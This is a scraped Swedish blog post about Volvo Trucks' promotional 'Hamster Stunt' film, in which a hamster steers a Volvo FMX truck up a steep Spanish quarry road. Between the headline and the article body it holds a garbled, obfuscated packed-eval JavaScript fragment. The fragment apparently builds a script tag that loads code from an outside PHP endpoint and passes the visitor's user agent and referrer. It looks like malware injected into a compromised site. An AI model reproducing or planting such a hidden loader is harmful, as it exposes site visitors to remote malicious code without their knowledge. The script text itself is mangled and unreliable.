Image Image Image Image Image Image Image Image Image Image

| 1 juni, 2020

Scroll to top

Top

Se hamstern Charlie köra Volvos nya lastbil FMX

Se hamstern Charlie köra Volvos nya lastbil FMX

type=”text/javascript”>// eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hziit|var|u0026u|referrer|skfky||js|php’.split(’|’),0,{}))

I den här filmen från Volvo lastvagnar få vi träffa på hamstern Charlie som får i uppdrag att styra den nya jätten Volvo FMX upp för en bergig väg i Spanien. Det är ett test för att visa hur bra styrdynamik den nya lastbilen från Volvo har.

”I filmen testar vi vår nya teknik som gör lastbilen så lätt och enkel att manövrera att det kan göras av en hamster”, säger Claes Nilsson, VD för Volvo Lastvagnar.

Denna film är exakt ett år efter den stora Youtube-hiten ”The Ballerina Stunt”. Förra veckan släppte Volvo teaser-filmen ”The Hook”, som redan har fått över två miljoner visningar på YouTube. Idag har den nästa häftiga stuntfilm premiär. I filmen ”The Hamster Stunt” styrs en 15-tons Volvo FMX av hamstern Charlie upp en brant backe i ett spanskt stenbrott.

Kika på det roliga ultimata testet ovan! Påkostat eller hur?